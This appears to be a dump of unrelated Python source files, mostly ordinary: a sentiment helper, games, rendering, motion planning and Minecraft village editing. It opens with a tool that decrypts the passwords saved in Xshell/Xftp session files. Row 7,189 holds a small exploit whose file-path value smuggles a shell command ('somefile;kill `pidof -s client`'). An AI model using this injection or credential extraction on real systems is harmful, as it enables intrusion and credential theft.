print('%-20s : %s' % ('Encrypted Password', en_password))
def decrypt_string(password_string, need_return=False):
if not is_number(VERSION):
raise ValueError('Invalid argument: --Version')
ver = float(VERSION)
Cipher = ARC4.new(getCipherKey())
try:
if ver < 5.1:
de_password = Cipher.decrypt(b64decode(password_string)).decode()
else:
data = b64decode(password_string)
ciphertext, checksum = data[:-SHA256.digest_size], data[-SHA256.digest_size:]
plaintext = Cipher.decrypt(ciphertext)
if SHA256.new(plaintext).digest() != checksum:
raise ValueError('Cannot decrypt string. The key is wrong!')
de_password = plaintext.decode('ascii')
if need_return:
return de_password
else:
print('%-20s : %s' % ('Version', VERSION))
print('%-20s : %s' % ('Password', password_string))
print('%-20s : %s' % ('Decrypted Password', de_password))
except Exception as e:
print("Password is invalid")
def decrypt_file(filepath: str = ''):
if not os.path.isfile(filepath):
print(f"{filepath:=^100}\nError: No file")
return
file = os.path.basename(os.path.realpath(filepath))
if file.endswith(".xsh") or file.endswith(".xfp"):
cfg = configparser.ConfigParser()
try:
cfg.read(filepath)
except UnicodeDecodeError:
cfg.read(filepath, encoding="utf-16")
try:
if file.endswith(".xsh"):
host = cfg["CONNECTION"]["Host"]
port = cfg["CONNECTION"]["Port"]
username = cfg["CONNECTION:AUTHENTICATION"]["UserName"]
password = cfg["CONNECTION:AUTHENTICATION"]["Password"]
version = cfg["SessionInfo"]["Version"]
de_password = decrypt_string(password, True)
else:
host = cfg["Connection"]["Host"]
port = cfg["Connection"]["Port"]
username = cfg["Connection"]["UserName"]
password = cfg["Connection"]["Password"]
version = cfg["SessionInfo"]["Version"]
de_password = decrypt_string(password, True)
print(f"{filepath:=^100}")
print('%-20s : %s' % ('Host', host))
print('%-20s : %s' % ('Port', port))
print('%-20s : %s' % ('Version', version))
print('%-20s : %s' % ('UserName', username))
print('%-20s : %s' % ('Password', de_password))
print('%-20s : %s' % ('Encrypted Password', password))
except Exception as e:
print(f"{filepath:=^100}\nError:{e}")
def decrypt_dir():
for root, dirs, files in os.walk(KEY):
for f in files:
decrypt_file(os.path.join(root, f))
def setDefaultSessionDirByVer():
if not is_number(VERSION):
return
ver = float(VERSION)
dir = 'Xshell' if IS_XSH else 'Xftp';
global KEY
if ver < 6:
KEY = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang\%s\Sessions" % dir)
elif ver == 6:
KEY = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang Computer\6\%s\Sessions" % dir)
def is_number(s):
try:
float(s)
return True
except ValueError:
pass
try:
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="xsh, xfp password decrypt")
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument("-e", "--encrypt", default=False,
help="<-e | -d> encrypt password, default -d", action="store_true")
group.add_argument("-d", "--decrypt", default=True,
help="<-e | -d> decrypt encrypted password, default -d", action="store_true")
parser.add_argument("-f", "--ftp", default=False,
help="xftp or xshell. Ignore if it is xshell", action="store_true")
parser.add_argument("-u", "--username", default="", type=str,
help="user `whoami /user` in command. Ignore if it is local. Used by version >= 5.1")
parser.add_argument("-m", "--master_pwd", default="", type=str,
help="user\'s master password. Used by version >= 6")
parser.add_argument("-s", "--sid", default="", type=str,
help="SID `whoami /user` in command. Ignore if it is local. Used by version >= 5.1")
parser.add_argument("-v", "--version", default="", type=str,
help="xsh or xfp version. If not specified, 5.2 will be used.")
parser.add_argument("-k", "--key", default="", nargs='?',
help="the path of sessions directory or file of xsh or xfp, or password or other key")
args = parser.parse_args()
#print(args)
if args.encrypt:
IS_DECRYPT = False
if args.sid:
SID = args.sid
if args.username:
USERNAME = args.username
if args.master_pwd:
MASTER_PWD = args.master_pwd
if args.ftp:
IS_XSH = False
if is_number(args.version):
VERSION = args.version
if args.key:
KEY = args.key
if not args.key and (is_number(args.version) or args.ftp):
setDefaultSessionDirByVer()
if IS_DECRYPT:
if os.path.isdir(KEY):
decrypt_dir()
elif os.path.isfile(KEY):
decrypt_file(KEY)
else:
decrypt_string(KEY)
else:
encrypt_string(KEY) |
7,182 | 82f86284dddf48bf2c65ddf55eb6d7a372306373 | #Import dependencies
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
import string
import operator
from sklearn.feature_extraction.text import CountVectorizer
import pickle
import nltk
from nltk.corpus import stopwords
#nltk.download('stopwords')
from nltk.tokenize import word_tokenize
def text_process(text):
nopunc = [char for char in text if char not in string.punctuation]
nopunc = ''.join(nopunc)
return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
#Looping through the web-scraped reviews to make predictions
def ml_predictor(web_scrapedf):
def text_process(text):
nopunc = [char for char in text if char not in string.punctuation]
nopunc = ''.join(nopunc)
return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
#Loading the model
loaded_model = pickle.load(open("ml_model/model.pickle", 'rb'))
#Loading the vectorizor
loaded_vectorizor = pickle.load(open("ml_model/vectorizer.pickle", 'rb'))
#Creating predictions for each review
for label, row in web_scrapedf.iterrows():
text = row['Reviews']
text_transform = loaded_vectorizor.transform([text])
ml_prediction = loaded_model.predict(text_transform)[0]
web_scrapedf.at[label, 'ml_predictions'] = ml_prediction
#Filtering on columns we need
scrape_results_df = web_scrapedf[['Reviews', 'ml_predictions']]
return scrape_results_df
#Function to create positive words for word cloud
def positive_words(scrape_results_df):
def text_process(text):
nopunc = [char for char in text if char not in string.punctuation]
nopunc = ''.join(nopunc)
return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
#Creating list of positive words
positive_wordcloud = scrape_results_df[scrape_results_df['ml_predictions'] == 'Positive']
positivecv = CountVectorizer(analyzer=text_process)
positive_fit=positivecv.fit_transform(positive_wordcloud['Reviews'])
#creating key value dicitionary pair of counts
positive_word_list = positivecv.get_feature_names();
positive_count_list = positive_fit.toarray().sum(axis=0)
positive_words = dict(zip(positive_word_list, positive_count_list))
positive_sorted = sorted(positive_words.items(), key=operator.itemgetter(1), reverse=True)
positive_sorted = [(p[0], int(p[1])) for p in positive_sorted]
positive_sorted = positive_sorted[:49]
return positive_sorted
#Function to create negative words for word cloud
def negative_words(scrape_results_df):
def text_process(text):
nopunc = [char for char in text if char not in string.punctuation]
nopunc = ''.join(nopunc)
return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
#Creating the list of negative words
negative_wordcloud = scrape_results_df[scrape_results_df['ml_predictions'] == 'Negative']
negativecv = CountVectorizer(analyzer=text_process)
negative_fit=negativecv.fit_transform(negative_wordcloud['Reviews'])
#creating key value dicitionary pair of counts
negative_word_list = negativecv.get_feature_names();
negative_count_list = negative_fit.toarray().sum(axis=0)
negative_words = dict(zip(negative_word_list, negative_count_list))
negative_sorted = sorted(negative_words.items(), key=operator.itemgetter(1), reverse=True)
negative_sorted = [(n[0], int(n[1])) for n in negative_sorted]
negative_sorted = negative_sorted[:49]
return negative_sorted
|
7,183 | cb1e73d172314c8d3d31f6e49fa67582375c0c58 | #!/usr/bin/env python3
# coding:utf-8
# ๆน่ฟๅฐ็บข็
class Ball:
def __init__(self, canvas, paddle, color):
self.canvas = canvas
self.paddle = paddle
self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
self.canvas.move(self.id, 245, 100)
starts = [-3, -2, -1, 1, 2, 3]
random.shuffle(starts) # ๆไนฑ starts
self.x = starts[0]
self.y = -3
self.canvas_height = self.canvas.winfo_height() # ่ทๅ้ซๅบฆๅๆ
self.canvas_width = self.canvas.winfo_width() # ่ทๅๅฎฝๅบฆๅๆ
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id) # ่ทๅๅๆ
if pos[1] <= 0:
self.y = 3
if pos[3] >= self.canvas_height:
self.y = -3
if self.hit_paddle(pos) == True:
self.y = -3
if pos[0] <= 0:
self.x = 3
if pos[2] >= self.canvas_width:
self.x = -3
# ๆๅฐ็ๅ ๅ
ฅไธปๅพช็ฏ
while 1:
ball.draw()
tk.update_idletasks()
tk.update()
time.sleep(0.01)
|
7,184 | 222948fb0a991bb6d7faa186c7442a303b88290b | from django.contrib import admin
from apps.cart.models import *
# Register your models here.
class CartAdmin(admin.ModelAdmin):
list_display = ('user_id', 'goods_id', 'goods_num')
search_fields = ('user_id', 'goods_id', 'goods_num')
list_filter = ['user_id', 'goods_id', 'goods_num']
admin.site.register(Cart, CartAdmin)
|
7,185 | 9a02bd0bc14494db033c032003aa5baea111ea8c | import random
import Manhattan_segmental_dist
# Greedy
# s: dictionary of points
# k: number of medoids
# returns
# k medoids from sample set s
def greedy(s, k):
# print("Hello Word!")
m_1 = random.choice(list(s.keys()))
medoids = {m_1: s[m_1]}
dimensions = list(range(len(s[m_1])))
s.pop(m_1)
dist = {}
# compute distance between each point and medoid m1
for x in s:
dist[x] = Manhattan_segmental_dist.manhattan_segmental_dist(medoids[m_1], s[x], dimensions)
for i in range(1, k):
m_i = max(dist, key=lambda x: dist.get(x))
medoids[m_i] = s[m_i]
dist.pop(m_i)
s.pop(m_i)
for x in s:
dist[x] = min(dist[x], Manhattan_segmental_dist.manhattan_segmental_dist(medoids[m_i], s[x], dimensions))
return medoids
|
7,186 | 1f8040776a55d6fe52b64c714d4003469460e454 | # ์ฌ์ฌ๋ฌธ์ 22
# ํ์ค ์
๋ ฅ์ผ๋ก ์ ์ ๋ ๊ฐ๊ฐ ์
๋ ฅ๋ฉ๋๋ค(์ฒซ ๋ฒ์งธ ์
๋ ฅ ๊ฐ์ ๋ฒ์๋ 1~20, ๋ ๋ฒ์งธ ์
๋ ฅ ๊ฐ์ ๋ฒ์๋ 10~30์ด๋ฉฐ ์ฒซ ๋ฒ์งธ ์
๋ ฅ ๊ฐ์ ๋ ๋ฒ์งธ ์
๋ ฅ ๊ฐ๋ณด๋ค ํญ์ ์์ต๋๋ค).
# ์ฒซ ๋ฒ์งธ ์ ์๋ถํฐ ๋ ๋ฒ์งธ ์ ์๊น์ง๋ฅผ ์ง์๋ก ํ๋ 2์ ๊ฑฐ๋ญ์ ๊ณฑ ๋ฆฌ์คํธ๋ฅผ ์ถ๋ ฅํ๋ ํ๋ก๊ทธ๋จ์ ๋ง๋์ธ์
# (input์์ ์๋ด ๋ฌธ์์ด์ ์ถ๋ ฅํ์ง ์์์ผ ํฉ๋๋ค). ๋จ, ๋ฆฌ์คํธ์ ๋ ๋ฒ์งธ ์์์ ๋ค์์ ๋ ๋ฒ์งธ ์์๋ ์ญ์ ํ ๋ค ์ถ๋ ฅํ์ธ์. ์ถ๋ ฅ ๊ฒฐ๊ณผ๋ ๋ฆฌ์คํธ ํํ๋ผ์ผ ํฉ๋๋ค.
start, stop = list(map(int, input().split()))
1 10
i = 0
my = [2 ** i for i in range(start, stop+1)]
my.pop(1)
my.pop(-2)
print(my)
# ์ฌ์ฌ๋ฌธ์ 23
col, row = list(map(int, input().split()))
matrix = []
for i in range(row):
matrix.append(list(input()))
|
7,187 | d4a4ea67a06107ad7ea18bb21fb1ec9e74ccd7c1 | #!/usr/bin/env python
import sys
import subprocess
import mystem
def run(args, fin=sys.stdin, fout=sys.stdout, ferr=sys.stderr, input_data=None):
'''\
Generic wrapper for MyStem
'''
mystem_path = mystem.util.find_mystem()
# make utf-8 a default encoding
if '-e' not in args:
args.extend(["-e", "utf-8"])
p = subprocess.Popen([mystem_path] + args,
stdout=fout,
stderr=ferr,
stdin=fin)
out_data, err_data = p.communicate(input=input_data)
return p.returncode, out_data, err_data
def main(args):
return run(args)
if __name__ == "__main__":
sys.exit(main(sys.argv[1:])[0])
|
7,188 | 84febcc599aa97858ded3b6f803b6b76960878d4 | from itertools import takewhile
import numpy as np
from .rrt import TreeNode
from .trajectory.linear import get_default_limits, solve_linear
from .trajectory.retime import spline_duration
from .utils import argmin, negate, circular_difference, UNBOUNDED_LIMITS, get_distance, get_delta
ASYMETRIC = True
def asymmetric_extend(q1, q2, extend_fn, backward=False):
if backward and ASYMETRIC:
return reversed(list(extend_fn(q2, q1))) # Forward model
return extend_fn(q1, q2)
def extend_towards(tree, target, distance_fn, extend_fn, collision_fn, swap=False, tree_frequency=1, **kwargs):
assert tree_frequency >= 1
last = argmin(lambda n: distance_fn(n.config, target), tree)
extend = list(asymmetric_extend(last.config, target, extend_fn, backward=swap))
safe = list(takewhile(negate(collision_fn), extend))
for i, q in enumerate(safe):
if (i % tree_frequency == 0) or (i == len(safe) - 1):
last = TreeNode(q, parent=last)
tree.append(last)
success = len(extend) == len(safe)
return last, success
##################################################
def calculate_radius(d=2):
# TODO: unify with get_threshold_fn
# Sampling-based Algorithms for Optimal Motion Planning
# http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.419.5503&rep=rep1&type=pdf
# https://en.wikipedia.org/wiki/Volume_of_an_n-ball
interval = (1 - 0)
vol_free = interval ** d
radius = 1./2
vol_ball = np.pi * (radius ** d)
gamma = 2 * ((1 + 1. / d) * (vol_free / vol_ball)) ** (1. / d)
# threshold = gamma * (math.log(n) / n) ** (1. / d)
return gamma
def default_weights(conf, weights=None, scale=1.):
if weights is not None:
return weights
d = len(conf)
weights = scale*np.ones(d)
return weights
def get_embed_fn(weights):
weights = np.array(weights)
return lambda q: weights * q
def get_distance_fn(weights, p_norm=2):
embed_fn = get_embed_fn(weights)
return lambda q1, q2: np.linalg.norm(embed_fn(q2) - embed_fn(q1), ord=p_norm)
def distance_fn_from_extend_fn(extend_fn):
# TODO: can compute cost between waypoints from extend_fn
def distance_fn(q1, q2):
path = list(extend_fn(q1, q2)) # TODO: cache
return len(path) # TODO: subtract endpoints?
return distance_fn
##################################################
def get_difference_fn(circular={}):
def fn(q2, q1):
return tuple(circular_difference(v2, v1, interval=circular.get(i, UNBOUNDED_LIMITS))
for i, (v2, v1) in enumerate(zip(q2, q1)))
return fn
def get_cost_fn(distance_fn=get_distance, constant=0., coefficient=1.):
def fn(q1, q2):
return constant + coefficient*distance_fn(q1, q2)
return fn
def get_duration_fn(difference_fn=get_delta, t_constant=0., t_min=0., **kwargs):
v_max, a_max = get_default_limits(d=None, **kwargs)
def fn(q1, q2):
# TODO: be careful that not colinear with other waypoints
difference = difference_fn(q1, q2)
t_transit = 0.
if not np.allclose(np.zeros(len(difference)), difference, atol=1e-6, rtol=0):
t_transit = solve_linear(difference, v_max, a_max, only_duration=True)
assert t_transit is not None
#curve = solve_linear(difference, v_max, a_max)
#t_transit = spline_duration(curve)
t = t_constant + t_transit
return max(t_min, t) # TODO: clip function
return fn |
7,189 | f19e853af675c16dfbb911bf2b756de0f1e3f2f8 | #!/usr/bin/python
import os
from base_exploit import *
from reporter import *
from netfw import *
import sys
class remote_shell(base_exploit):
id = EXPLOIT_ID_REMOTE_SHELL
def exploit(self, ip, port):
# Create a connection to requested destination
s = socket(AF_INET, SOCK_DGRAM)
s.connect((ip, port))
# Change script's working directory to this dir
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
# Read the payload
payload = " "
# Path to override
#path = "somefile;kill `pidof client | tr \" \" \\\\\\\\n | head -n 1`".replace(" ", "\t")
path = "somefile;kill `pidof -s client`".replace(" ", "\t")
# Create the malicious packet
pkt = ProtocolHandleUpper(path, payload)
# Fragment the packets and send
FragmentedPacket(pkt).send(s)
if __name__ == "__main__":
if (len(sys.argv) != 3):
print "RemoteShell exploit"
print "Usage: %s <ip> <Wrapper RECV port>" % (sys.argv[0])
exit(0)
exp = remote_shell(TEAM_CONFIG_DEBUG)
score = exp.run()
print "exploit returned score %s" % score
|
7,190 | 014509170b98a38838859d3ca48c74ca6be0bd46 | #encoding:utf-8
class Employee():
def __int__(self,name,sex,salary):
self.name = name
self.sex = sex
self.salary = salary
def give_raise(self):
222 |
7,191 | 061c287d5f0a5feeeaedc80eea6b3fc4ff02286e | import logging
from typing import Dict
import numpy as np
from meshkit import Mesh
from rendkit.materials import DepthMaterial
from vispy import gloo, app
from vispy.gloo import gl
logger = logging.getLogger(__name__)
class Renderable:
def __init__(self,
material_name: str,
attributes: Dict[str, np.ndarray],
model_mat=np.eye(4),
uv_scale=1.0):
self.model_mat = model_mat
self.material_name = material_name
self._attributes = attributes
self._uv_scale = uv_scale
self._current_scene = None
self._program = None
self._scene_version = -1
def set_uv_scale(self, scale):
self._uv_scale = scale
if 'a_uv' in self._attributes:
if self._program is not None:
self._program['u_uv_scale'] = self._uv_scale
def scale_uv_scale(self, v):
self._uv_scale *= v
if 'a_uv' in self._attributes:
if self._program is not None:
self._program['u_uv_scale'] = self._uv_scale
def activate(self, scene, camera):
material = scene.get_material(self.material_name)
if self._program is None or scene != self._current_scene:
self._current_scene = scene
self._scene_version = -1
if self._scene_version != scene.version:
self._current_scene = scene
self._scene_version = scene.version
self._program = material.compile(
num_lights=len(scene.lights),
num_shadow_sources=len(scene.shadow_sources),
use_radiance_map=scene.radiance_map is not None)
material.upload_attributes(self._program, self._attributes, self._uv_scale)
material.upload_radmap(self._program, scene.radiance_map)
material.upload_shadow_sources(self._program, scene.shadow_sources)
material.upload_lights(self._program, scene.lights)
material.upload_camera(self._program, camera)
self._program['u_model'] = self.model_mat.T
return self._program
def mesh_to_renderables(mesh: Mesh, model_mat):
renderables = []
# For now each renderable represents a submesh with the same materials.
for material_id, material_name in enumerate(mesh.materials):
filter = {'material': material_id}
vertex_positions = mesh.expand_face_vertices(filter)
vertex_normals = mesh.expand_face_normals(filter)
vertex_tangents, vertex_bitangents = mesh.expand_tangents(
filter)
vertex_uvs = mesh.expand_face_uvs(filter)
if len(vertex_positions) < 3:
logger.warning('Material {} not visible.'.format(material_name))
continue
attributes = dict(
a_position=vertex_positions,
a_normal=vertex_normals,
a_tangent=vertex_tangents,
a_bitangent=vertex_bitangents,
a_uv=vertex_uvs
)
renderables.append(Renderable(material_name, attributes, model_mat,
uv_scale=mesh.uv_scale))
return renderables
class DummyRenderer(app.Canvas):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
gloo.set_viewport(0, 0, *self.size)
def __enter__(self):
self._backend._vispy_warmup()
return self
class ContextProvider:
def __init__(self, size):
self.size = size
canvas = gloo.get_current_canvas()
self.context_exists = canvas is not None and not canvas._closed
if self.context_exists:
logger.debug("Using existing OpenGL context.")
self.provider = gloo.get_current_canvas()
self.previous_size = self.provider.size
else:
logger.debug("Providing temporary context with DummyRenderer.")
self.provider = DummyRenderer(size=size)
def __enter__(self):
gloo.set_viewport(0, 0, *self.size)
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.context_exists:
self.provider.__exit__(exc_type, exc_val, exc_tb)
else:
gloo.set_viewport(0, 0, *self.previous_size)
def draw_depth(camera, renderables, rend_target):
rendfb, rendtex, _ = rend_target
material = DepthMaterial()
program = DepthMaterial().compile()
with rendfb:
gloo.clear(color=camera.clear_color)
gloo.set_state(depth_test=True)
gl.glEnable(gl.GL_CULL_FACE)
gl.glCullFace(gl.GL_FRONT)
for renderable in renderables:
material.upload_camera(program, camera)
material.upload_attributes(program, renderable._attributes)
program['u_model'] = renderable.model_mat.T
program.draw(gl.GL_TRIANGLES)
gl.glCullFace(gl.GL_BACK)
gl.glDisable(gl.GL_CULL_FACE)
|
7,192 | 34c91d273648ae72731fba7f5519a4920d77c0c3 | include ("RecExRecoTest/RecExRecoTest_RTT_common.py")
from BTagging.BTaggingFlags import BTaggingFlags
BTaggingFlags.Active=False
# main jobOption
include ("RecExCommon/rdotoesdnotrigger.py")
include ("RecExRecoTest/RecExRecoTest_RTT_common_postOptions.py")
|
7,193 | f0f9541eba29b4488c429c889f3b346d53d0239d | import json
data = '{"var1": "harry", "var2":56}'
parsed = json.loads(data)
print(parsed['var1'])
# data2 = {"channel_name": "Chill_Out",
# "Cars": ["BMW", "Audi a8", "ferrari"],
# "fridge": ("loki", "Aalu", "pasta"),
# "isbad": False
# }
# jscomp = json.dumps(data2)
# print(jscomp)
|
7,194 | 9a60449aa13bc5e7e413d0e47a1972d93ccfe69f | a=input().split(' ')
A=int(a[0])
B=int(a[1])
X=int(a[2])
if A<=X and A+B>=X:
print('YES')
else:
print('NO') |
7,195 | bb5bea4ea100950b59fb2b168b75dec349938aac | import numpy as np
import cv2
import myrustlib
def detect_lines_hough(img):
lines = cv2.HoughLinesP(
cv2.bitwise_not(opening),
rho = 1,
theta = np.pi / 2,
threshold=50,
minLineLength=120,
maxLineGap=10
)
return [line[0] for line in lines] # weird HoughLinesP output
def detect_lines_rust(img, min_line_length):
height, width = img.shape
white = (img == 255).flatten().tolist()
detected = myrustlib.detect_lines(white, width, height, min_line_length)
return split_by_orientation(detected)
def detect_lines(img, min_line_length):
"""
Custom line detection algorithm
"""
height, width = img.shape
horizontal = []
vertical = []
current_line = False
current_line_start = 0
white = img == 255
for y in range(height):
for x in range(width):
is_white = white.item(y,x)
if(is_white):
if not current_line:
current_line = True
current_line_start = x
else:
if current_line:
current_line = False
if x - current_line_start > min_line_length:
horizontal.append((current_line_start, y, x - 1, y))
if current_line:
current_line = False
if x - current_line_start > min_line_length:
horizontal.append((current_line_start, y, x - 1, y))
current_line = False
current_line_start = 0
for x in range(width):
for y in range(height):
is_white = white.item(y,x)
if(is_white):
if not current_line:
current_line = True
current_line_start = y
else:
if current_line:
current_line = False
if y - current_line_start > min_line_length:
vertical.append((x, y - 1, x, current_line_start))
if current_line:
current_line = False
if y - current_line_start > min_line_length:
vertical.append((x, y - 1, x, current_line_start))
return (horizontal, vertical)
def remove_lines_close_to_border(horizontal, vertical, width, height, min_distance):
horizontal_result = []
vertical_result = []
for h in horizontal:
y = h[1]
if y > min_distance and height - y > min_distance:
horizontal_result.append(h)
for v in vertical:
x = v[0]
if x > min_distance and width - x > min_distance:
vertical_result.append(v)
return (horizontal_result, vertical_result)
def split_by_orientation(lines):
horizontal = []
vertical = []
for x1,y1,x2,y2 in lines:
if (abs(y1-y2) > abs(x1-x2)):
vertical.append((x1,y1,x2,y2))
else:
horizontal.append((x1,y1,x2,y2))
return (horizontal, vertical)
def reduce_lines(input_horizontal, input_vertical, min_distance):
"""
Takes a list of vertical and horizontal lines,
tries to reduce them to essential lines eliminating lines close to each
other.
"""
seen_vertical = set()
seen_horizontal = set()
output_vertical = []
output_horizontal = []
# vertical
for index, (x1,y1,x2,y2) in enumerate(input_vertical):
if index in seen_vertical:
continue
x_values = [x1]
for other_index, (x1_b,y1_b,x2_b,y2_b) in enumerate(input_vertical):
if other_index in seen_vertical:
continue
if (abs(x1 - x1_b) < min_distance):
# if the end is further to the top, choose this end
if (y2_b < y2):
y2 = y2_b
# if the start if further to the bottom, choose it
if (y1_b > y1):
y1 = y1_b
x_values.append(x1_b)
seen_vertical.add(other_index)
# taking the average x value for all the lines to get the middle
x = int(np.mean(x_values))
output_vertical.append((x,y1,x,y2))
#horizontal
for index, (x1,y1,x2,y2) in enumerate(input_horizontal):
if index in seen_horizontal:
continue
y_values = [y1, y2]
for other_index, (x1_b,y1_b,x2_b,y2_b) in enumerate(input_horizontal):
if other_index in seen_horizontal:
continue
if (abs(y1 - y1_b) < min_distance):
# if the start if further to the left, choose this point
if (x1_b < x1):
x1 = x1_b
# if the end is further to the right, choose it
if (x2_b > x2):
x2 = x2_b
y_values += [y1_b, y2_b]
seen_horizontal.add(other_index)
# taking the average y value for all the lines to get the middle
y = int(np.mean(y_values))
output_horizontal.append((x1,y,x2,y))
return (output_vertical, output_horizontal)
def connect_lines(horizontal_lines, vertical_lines):
"""
Makes sure the ends of every line are touching another line
Possible improvements:
- Prefer crossing lines in the direction of the end
- e.g. the right end of a horizontal should rather connect to a vertical to the closest_vertical_right
- Make sure the "crossing line" is actually long enough to cross this line
Idea:
- Test and improve this algorithm by
- 1. create lines a la mondrian
- 2. randomly shorten this lines
- 3. run the algorithm over the sortened version
- 4. check whether the result is the original
"""
horizontal = []
vertical = []
for x1,y1,x2,y2 in horizontal_lines:
closest_vertical_left = 20000
closest_vertical_right = 20000
for v_x1,v_y1,v_x2,v_y2 in vertical_lines:
if abs(x1 - v_x1) < abs(closest_vertical_left):
closest_vertical_left = x1 - v_x1
if abs(x2 - v_x1) < abs(closest_vertical_right):
closest_vertical_right = x2 - v_x1
x1 = x1 - closest_vertical_left
x2 = x2 - closest_vertical_right
horizontal.append((x1,y1,x2,y2))
for x1,y1,x2,y2 in vertical_lines:
closest_horizontal_up = 20000
closest_horizontal_down = 20000
for h_x1,h_y1,h_x2,h_y2 in horizontal_lines:
if abs(y1 - h_y1) < abs(closest_horizontal_up):
closest_horizontal_up = y1 - h_y1
if abs(y2 - h_y1) < abs(closest_horizontal_down):
closest_horizontal_down = y2 - h_y1
y1 = y1 - closest_horizontal_up
y2 = y2 - closest_horizontal_down
vertical.append((x1,y1,x2,y2))
return (horizontal, vertical)
def find_rectangles(top_left, bottom_left, bottom_right, top_right):
top_right.sort(key=lambda pos: pos[0])
bottom_left.sort(key=lambda pos: pos[1])
rectangles = []
for x,y in top_left:
a = [tr for tr in top_right if tr[1] == y and tr[0] > x]
b = [bl for bl in bottom_left if bl[0] == x and bl[1] > y]
if (len(a) == 0 or len(b) == 0):
continue
x2,_a = a[0]
_,y2 = b[0]
w = x2 - x
h = y2 - y
rectangles.append((x,y,w,h))
return rectangles
def find_corners(horizontal, vertical):
top_left = []
top_right = []
bottom_left = []
bottom_right = []
for x_1,y_h,x_2,_ in horizontal:
for x_v,y_1,_,y_2 in vertical:
crossing = (x_v, y_h)
if (x_v >= x_1 and x_v <= x_2 and y_h <= y_1 and y_h >= y_2):
if (x_1 == x_v):
# left
if (y_1 != y_h):
bottom_left.append(crossing)
if (y_2 != y_h):
top_left.append(crossing)
elif (x_2 == x_v):
# right
if (y_1 != y_h):
bottom_right.append(crossing)
if (y_2 != y_h):
top_right.append(crossing)
else:
if y_1 != y_h:
top_left.append(crossing)
top_right.append(crossing)
if y_2 != y_h:
bottom_left.append(crossing)
bottom_right.append(crossing)
return (top_left, bottom_left, bottom_right, top_right)
|
7,196 | 4e9674ea46bdf930d1e99bcda56eaa300c84deef | from nbt import nbt
from matplotlib import pyplot
class Banana(object):
id = 10
def srange(x1, xDoors, spaces):
"""
a counting thing that i dunno what does.
"""
for a in xrange(x1, x1 + xDoors):
yield a
for a in xrange(x1 + xDoors + spaces, x1 + spaces + xDoors * 2):
yield a
def village_doors_coordinates(x1, villages, y, z1, halfDoorsInVillage, emptySpaces, axis):
"""
x1 and z1 are the lowest value on the X / Z axis
'halfDoorsInVillage' is 1/2 of the total doors in a village
:param axis: The axis along which a single village is created;
make a MCEDIT filter to do the same thing could be cool,
like a filter to create a village on every selected door, or on a row of doors on the X/Z axis.
"""
k = []
assert axis in ('X', 'Z')
if axis == "Z":
for x in xrange(x1, x1 + villages):
j = [[x, y, z] for z in srange(z1, halfDoorsInVillage, emptySpaces)]
k.append(j)
elif axis == "X":
for z in xrange(z1, z1 + villages):
j = [[x, y, z] for x in srange(x1, halfDoorsInVillage, emptySpaces)]
k.append(j)
return k
number_of_villages_to_generate = 32
number_of_doors_to_generate = 22
tick = 77
def template_village_file(tick):
"""
Creates a template villages.dat file that i can modify later on
"""
cat = nbt.NBTFile()
cat2 = cat['data'] = nbt.TAG_Compound()
cat2["Villages"] = nbt.TAG_List(Banana)
cat2['Tick'] = nbt.TAG_Int(tick)
return cat
def existing_village_file(kovetz):
"""
Create an editable villages.nbt file from an already existing one, using the same tick value
"""
try:
cat77 = nbt.NBTFile(kovetz)
except IOError:
raise Exception("Hmm. Unfortunately, the file requested does not exist :(")
tick4 = cat77['data']['Tick'].value
return cat77, tick4
class Village(object):
"""
Some villages.dat related functions
village is a tag_compound
:type village: nbt.TAG_Compound
"""
def __init__(self, village):
self._village = village
def add_door(self, door):
"""
Adds a door and updates the current village aggregate and center with some magic math stuff
"""
doors_list = self._village['Doors']
doors_list.append(door)
x = door['X'].value
y = door['Y'].value
z = door['Z'].value
self._update_doormath(x, y, z)
def del_doorz(self, new_doors):
kapoow = self.get_vil()['Doors']
kapooww = list(kapoow)
for door in kapooww:
x, y, z = door['X'].value, door['Y'].value, door['Z'].value
if (x, y, z) in new_doors:
kapoow.remove(door)
self._update_doormath(-x, -y, -z)
def _update_doormath(self, x, y, z):
doors_list = self._village['Doors']
self._village['ACX'].value += x
self._village['ACY'].value += y
self._village['ACZ'].value += z
if len(doors_list) == 0:
self._village['CX'] = nbt.TAG_Int(0)
self._village['CY'] = nbt.TAG_Int(0)
self._village['CZ'] = nbt.TAG_Int(0)
else:
self._village['CX'].value = self._village['ACX'].value / len(doors_list)
self._village['CY'].value = self._village['ACY'].value / len(doors_list)
self._village['CZ'].value = self._village['ACZ'].value / len(doors_list)
@property
def is_empty(self):
return len(self._village["Doors"]) == 0
def get_vil(self):
return self._village
@staticmethod
def create_village(tick):
"""
Creates a template village
"""
village_template = nbt.TAG_Compound()
village_template['Doors'] = nbt.TAG_List(Banana)
village_template['Players'] = nbt.TAG_List(Banana)
village_template['ACX'] = nbt.TAG_Int(0)
village_template['ACY'] = nbt.TAG_Int(0)
village_template['ACZ'] = nbt.TAG_Int(0)
village_template['CX'] = nbt.TAG_Int(0)
village_template['CY'] = nbt.TAG_Int(0)
village_template['CZ'] = nbt.TAG_Int(0)
village_template['Golems'] = nbt.TAG_Int(0)
village_template['MTick'] = nbt.TAG_Int(0)
village_template['PopSize'] = nbt.TAG_Int(1)
village_template['Radius'] = nbt.TAG_Int(32)
village_template['Stable'] = nbt.TAG_Int(tick)
village_template['Tick'] = nbt.TAG_Int(tick)
return Village(village_template)
def create_door(tick, x, y, z):
"""
Generates a door using given coords and tick.
"""
door = nbt.TAG_Compound()
door['TS'] = nbt.TAG_Int(tick)
door['X'] = nbt.TAG_Int(x)
door['Y'] = nbt.TAG_Int(y)
door['Z'] = nbt.TAG_Int(z)
return door
def del_door(vil_list, doors_set):
"""
:param vil_list:
:param doors_set:
